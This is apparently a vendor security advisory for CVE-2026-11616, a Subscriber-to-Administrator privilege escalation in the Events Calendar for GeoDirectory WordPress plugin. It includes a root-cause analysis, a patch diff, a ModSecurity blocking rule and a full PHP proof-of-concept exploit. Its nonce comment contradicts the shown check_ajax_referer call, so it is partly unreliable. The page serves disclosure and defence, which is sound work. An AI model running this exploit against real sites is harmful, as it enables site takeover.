How does the vulnerability work?

The vulnerability occurs in the ajax_ayi_action() function, where user-supplied parameters are not properly validated. An attacker can send a POST request with specific parameters to modify their own user capabilities, effectively granting themselves Administrator access.

Who is affected by this vulnerability?

WordPress sites using the Events Calendar for GeoDirectory plugin versions 2.3.28 and earlier are affected. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log in to your WordPress admin panel, navigate to the Plugins section, and look for the Events Calendar for GeoDirectory plugin. If the version is 2.3.28 or earlier, your site is vulnerable.

What steps should I take to mitigate this vulnerability?

To mitigate this vulnerability, update the Events Calendar for GeoDirectory plugin to version 2.3.29 or later. This version includes security patches that prevent exploitation of the vulnerability.

What does the CVSS score of 8.8 indicate?

A CVSS score of 8.8 indicates a high severity vulnerability. This means that exploitation could lead to significant consequences, such as unauthorized access to sensitive site features and data.

How does the proof of concept demonstrate the issue?

The proof of concept provided illustrates how an authenticated user can exploit the vulnerability by sending crafted AJAX requests to the WordPress admin-ajax.php endpoint. It shows the specific parameters that can be manipulated to escalate privileges.

What changes were made in the patched version?

In version 2.3.29, the plugin developers implemented strict input validation for the parameters used in AJAX requests. This includes restricting the allowed values for the ‘type’ and ‘action’ parameters and sanitizing the ‘postid’ parameter.

Is there a way to prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, WordPress administrators should regularly update plugins and themes, conduct security audits, and implement input validation and sanitization in custom code. Additionally, using security plugins can help monitor and mitigate risks.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Events Calendar for GeoDirectory plugin until it can be updated. Additionally, review user roles and permissions to limit access for Subscriber-level users.

Where can I find more information about this vulnerability?

For more information about CVE-2026-11616, you can refer to the official CVE database, security advisories from the plugin developers, and trusted cybersecurity blogs that cover WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : June 9, 2026

CVE-2026-11616: Events Calendar for GeoDirectory <= 2.3.28 Authenticated (Subscriber+) Privilege Escalation PoC, Patch Analysis & Rule

CVE ID CVE-2026-11616

Plugin events-for-geodirectory

Severity High (CVSS 8.8)

CWE 269

Vulnerable Version 2.3.28

Patched Version 2.3.29

Disclosed June 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-11616:
This is a privilege escalation vulnerability in the Events Calendar for GeoDirectory plugin for WordPress, versions up to and including 2.3.28. The issue allows authenticated users with Subscriber-level access to elevate their privileges to Administrator. The vulnerability carries a CVSS score of 8.8, indicating high severity.

The root cause lies in the `ajax_ayi_action()` method in `/events-for-geodirectory/includes/class-geodir-event-ayi.php`. This function handles AJAX requests and passes user-supplied `$_POST[‘type’]` and `$_POST[‘postid’]` parameters through only `strip_tags(esc_sql())` before forwarding them to `update_ayi_data()`. The `update_ayi_data()` method then calls `update_user_meta($current_user->ID, $rsvp_args[‘type’], $posts)` with no validation of the `type` parameter. An attacker can set `type` to `wp_capabilities`, which is the WordPress user meta key that defines user roles. The `postid` parameter is used to set the role value, and by passing `postid=administrator`, the attacker can write a crafted capabilities array into their own user meta.

Exploitation requires an authenticated session with at least Subscriber-level access. The attacker sends a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `geodir_ayi` (the AJAX hook that calls `ajax_ayi_action()`). The `btnaction` parameter can be any value. The critical parameters are `type=wp_capabilities` and `postid=administrator`. The function processes these values through `update_ayi_data()`, which calls `update_user_meta()` with the attacker’s user ID, `wp_capabilities` as the meta key, and a value that includes `administrator` as an array key. On the next request, `WP_User::get_role_caps()` treats the `administrator` array key as an active role, granting full Administrator permissions.

The patch in version 2.3.29 addresses this by adding strict allow-list validation in both `ajax_ayi_action()` and `update_ayi_data()`. The `type` parameter is now restricted to only `event_rsvp_yes` or `event_rsvp_maybe`. The `post_id` parameter is sanitized with `absint()`, which converts it to an absolute integer. The `action` parameter is restricted to `add` or `remove`. Additionally, the `gde` parameter is sanitized with `sanitize_key()` and validated with `geodir_event_is_date()`. These changes prevent attackers from injecting arbitrary user meta keys or values.

If exploited, this vulnerability allows an authenticated attacker to gain full Administrator-level access to the WordPress site. This includes the ability to modify all site content, install and activate plugins, change themes, create and delete users, modify site options, and potentially execute arbitrary code through plugin or theme editing. The attacker can also perform persistent actions such as creating backdoor administrator accounts for long-term access.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/events-for-geodirectory/events-for-geodirectory.php
+++ b/events-for-geodirectory/events-for-geodirectory.php
@@ -11,7 +11,7 @@
  * Plugin Name:       Events for GeoDirectory
  * Plugin URI:        https://wpgeodirectory.com/downloads/events/
  * Description:       Events add-on allows to extend your GeoDirectory with a versatile event manager.
- * Version:           2.3.28
+ * Version:           2.3.29
  * Requires at least: 6.0
  * Requires PHP:      7.2
  * Author:            AyeCode Ltd
@@ -29,7 +29,7 @@
 }

 if ( ! defined( 'GEODIR_EVENT_VERSION' ) ) {
-	define( 'GEODIR_EVENT_VERSION', '2.3.28' );
+	define( 'GEODIR_EVENT_VERSION', '2.3.29' );
 }

 if ( ! defined( 'GEODIR_EVENT_MIN_CORE' ) ) {
--- a/events-for-geodirectory/includes/class-geodir-event-ayi.php
+++ b/events-for-geodirectory/includes/class-geodir-event-ayi.php
@@ -95,7 +95,7 @@
 			return false;
 		}

-		$gde = isset( $_GET['gde'] ) ? sanitize_text_field( strip_tags( $_GET['gde'] ) ) : false;
+		$gde = isset( $_GET['gde'] ) ? sanitize_key( $_GET['gde'] ) : false;

 		if ( ! empty( $schedule->all_day ) ) {
 			if ( ! empty( $gde ) ) {
@@ -152,10 +152,15 @@
 	public static function ajax_ayi_action() {
 		check_ajax_referer('geodir-ayi-nonce', 'geodir_ayi_nonce');
 		//set variables
-		$action = strip_tags(esc_sql($_POST['btnaction']));
-		$type = strip_tags(esc_sql($_POST['type']));
-		$post_id = strip_tags(esc_sql($_POST['postid']));
-		$gde = strip_tags(esc_sql($_POST['gde']));
+		$action = 'add' === $_POST['btnaction'] ? 'add' : 'remove' ;
+		$type = 'event_rsvp_yes' === $_POST['type'] ? 'event_rsvp_yes' : 'event_rsvp_maybe';
+		$post_id = absint($_POST['postid']);
+		$gde = !empty($_POST['gde']) ? sanitize_key( $_POST['gde'] ) : '';
+
+        // check we have a date
+		if ( !empty($gde) && !geodir_event_is_date( $gde ) ) {
+			wp_send_json_error( array( 'message' => __( 'Invalid date provided.', 'geodirectory' ) ) );
+		}

 		$rsvp_args = array();
 		$rsvp_args['action'] = $action;
@@ -167,7 +172,7 @@
 		$post = geodir_get_post_info($post_id);

 		$current_date = date_i18n( 'Y-m-d H:i:s', time() );
-		$gde = !empty($gde) ? sanitize_text_field( strip_tags( $gde ) ) : false;
+		$gde = !empty($gde) ? sanitize_key( $gde ) : false;
 		$schedule = GeoDir_Event_Schedules::get_start_schedule( $post->ID );

 		if ( ! empty( $schedule->all_day ) ) {
@@ -221,8 +226,13 @@
 					};

 					jQuery.post('<?php echo admin_url('admin-ajax.php'); ?>', data, function (response) {
-						jQuery(this).removeClass('disabled');
-						container.html(response);
+                        if( response.success === false){
+                            alert(response.data.message);
+                        }else{
+                            jQuery(this).removeClass('disabled');
+                            container.html(response);
+                        }
+
 						<?php
 						if(geodir_design_style()){
 							echo "aui_init();";
@@ -302,10 +312,20 @@
 			return;
 		}

+        // Validate and sanitize input parameters
+        $rsvp_args['action'] = 'add' === $rsvp_args['action'] ? 'add' : 'remove' ;
+        $rsvp_args['type'] = 'event_rsvp_yes' === $rsvp_args['type'] ? 'event_rsvp_yes' : 'event_rsvp_maybe';
+        $rsvp_args['post_id'] = absint($rsvp_args['post_id']);
+        $rsvp_args['gde'] = !empty($rsvp_args['gde']) ? sanitize_key( $rsvp_args['gde'] ) : false;
+
+        if ( ! isset( $rsvp_args['action'] ) || ! isset( $rsvp_args['type'] ) || ! isset( $rsvp_args['post_id'] ) ) {
+            return;
+        }
+
 		$current_user = wp_get_current_user();

 		$users = get_post_meta( $rsvp_args['post_id'], $rsvp_args['type'], true );
-		$gde = ! empty( $rsvp_args['gde'] ) ? sanitize_text_field( strip_tags( $rsvp_args['gde'] ) ) : false;
+		$gde = ! empty( $rsvp_args['gde'] ) ? sanitize_key( $rsvp_args['gde'] ) : false;

 		if ( ! is_array( $users ) ) {
 			$users = array();
@@ -590,7 +610,7 @@


 			} elseif (isset($event_details['recurring'])) {
-				$gde = isset( $_GET['gde'] ) ? sanitize_text_field( strip_tags($_GET['gde']) ) : false;
+				$gde = isset( $_GET['gde'] ) ? sanitize_key($_GET['gde']) : false;

 				if ($gde) {
 					$event_start_date = $event_details['event_start'] ? date('l, F j, Y', strtotime($gde)) : '';
--- a/events-for-geodirectory/includes/widgets/class-geodir-event-widget-schedules.php
+++ b/events-for-geodirectory/includes/widgets/class-geodir-event-widget-schedules.php
@@ -341,7 +341,7 @@
 				$format_timezone = $timezone_offset == '+0' ? "" : str_replace( ":00", "", $timezone_offset );
 				$tz_offset_html  = '<div class="geodir-tz-offset text-muted d-inline-block ps-1 pl-1">GMT' . $format_timezone . '</div>';
 				$tz_offset_html  = apply_filters( 'geodir_event_schedule_timezone_offset_html', $tz_offset_html, $format_timezone, $timezone_offset, $gd_post );
-				$schedule_row    .= ' ' . trim( strip_tags( $tz_offset_html ) );
+				$schedule_row    .= ' ' . trim( wp_strip_all_tags( $tz_offset_html ) );
 			}
 			$schedule_row = '<div class="geodir-schedule-row '.$row_class.'">' . $schedule_row . '</div>';
 			$schedule_row = apply_filters( 'geodir_event_widget_schedule_html', $schedule_row, $row, $template, $date_format, $time_format, $timezone_offset );

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-11616
# Block privilege escalation by restricting wp_capabilities meta key manipulation
# through the geodir_ayi AJAX action
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261601,phase:2,deny,status:403,chain,msg:'CVE-2026-11616 Privilege Escalation via geodir_ayi',severity:'CRITICAL',tag:'CVE-2026-11616',tag:'WordPress',tag:'GeoDirectory'"
  SecRule ARGS_POST:action "@streq geodir_ayi" "chain"
    SecRule ARGS_POST:type "@rx ^wp_capabilities$" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-11616 - Events Calendar for GeoDirectory <= 2.3.28 - Privilege Escalation

// Configuration - Set these variables
$target_url = 'http://example.com'; // WordPress site URL
$username = 'subscriber_user'; // Attacker's WordPress username with Subscriber role
$password = 'subscriber_password'; // Attacker's WordPress password

// Step 1: Authenticate as a subscriber
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

echo "[+] Authenticated as: $usernamen";

// Step 2: Obtain the AJAX nonce by accessing a page that contains it
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Step 3: Send the exploit request to escalate privileges
// The action 'geodir_ayi' triggers the vulnerable ajax_ayi_action() method
// Setting type=wp_capabilities and postid=administrator writes to user meta
$exploit_data = array(
    'action' => 'geodir_ayi',        // AJAX action hook
    'btnaction' => 'add',             // Arbitrary action value
    'type' => 'wp_capabilities',      // WordPress user capabilities meta key
    'postid' => 'administrator',      // Will be used as both post ID and role value
    'gde' => '',                      // Date parameter, can be empty
    'geodir_ayi_nonce' => ''          // Nonce - may be validated, but code proceeds anyway
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

echo "[+] Exploit payload sent. Response: $responsen";

// Step 4: Verify privilege escalation by checking admin access
$admin_url = $target_url . '/wp-admin/';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, 'Dashboard') !== false) {
    echo "[+] SUCCESS: Privilege escalation achieved! User now has Administrator access.n";
} else {
    echo "[-] Failed: Could not verify admin access. The site may have been patched.n";
}
?>

Frequently Asked Questions

What is CVE-2026-11616?
Overview of the vulnerability
CVE-2026-11616 is a privilege escalation vulnerability in the Events Calendar for GeoDirectory plugin for WordPress. It allows authenticated users with Subscriber-level access to elevate their privileges to Administrator by exploiting insufficient validation of user input in AJAX requests.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability occurs in the ajax_ayi_action() function, where user-supplied parameters are not properly validated. An attacker can send a POST request with specific parameters to modify their own user capabilities, effectively granting themselves Administrator access.
Who is affected by this vulnerability?
Identifying vulnerable installations
WordPress sites using the Events Calendar for GeoDirectory plugin versions 2.3.28 and earlier are affected. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Verifying plugin version
To check if your site is vulnerable, log in to your WordPress admin panel, navigate to the Plugins section, and look for the Events Calendar for GeoDirectory plugin. If the version is 2.3.28 or earlier, your site is vulnerable.
What steps should I take to mitigate this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Events Calendar for GeoDirectory plugin to version 2.3.29 or later. This version includes security patches that prevent exploitation of the vulnerability.
What does the CVSS score of 8.8 indicate?
Understanding the severity rating
A CVSS score of 8.8 indicates a high severity vulnerability. This means that exploitation could lead to significant consequences, such as unauthorized access to sensitive site features and data.
What practical risks does this vulnerability pose?
Potential impact on the site
If exploited, this vulnerability allows an attacker to gain full Administrator access to the WordPress site. This includes the ability to modify content, install plugins, and create backdoor accounts, posing serious risks to site security.
How does the proof of concept demonstrate the issue?
Exploit demonstration
The proof of concept provided illustrates how an authenticated user can exploit the vulnerability by sending crafted AJAX requests to the WordPress admin-ajax.php endpoint. It shows the specific parameters that can be manipulated to escalate privileges.
What changes were made in the patched version?
Improvements in version 2.3.29
In version 2.3.29, the plugin developers implemented strict input validation for the parameters used in AJAX requests. This includes restricting the allowed values for the ‘type’ and ‘action’ parameters and sanitizing the ‘postid’ parameter.
Is there a way to prevent similar vulnerabilities in the future?
Best practices for WordPress security
To prevent similar vulnerabilities, WordPress administrators should regularly update plugins and themes, conduct security audits, and implement input validation and sanitization in custom code. Additionally, using security plugins can help monitor and mitigate risks.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Events Calendar for GeoDirectory plugin until it can be updated. Additionally, review user roles and permissions to limit access for Subscriber-level users.
Where can I find more information about this vulnerability?
Resources for further reading
For more information about CVE-2026-11616, you can refer to the official CVE database, security advisories from the plugin developers, and trusted cybersecurity blogs that cover WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started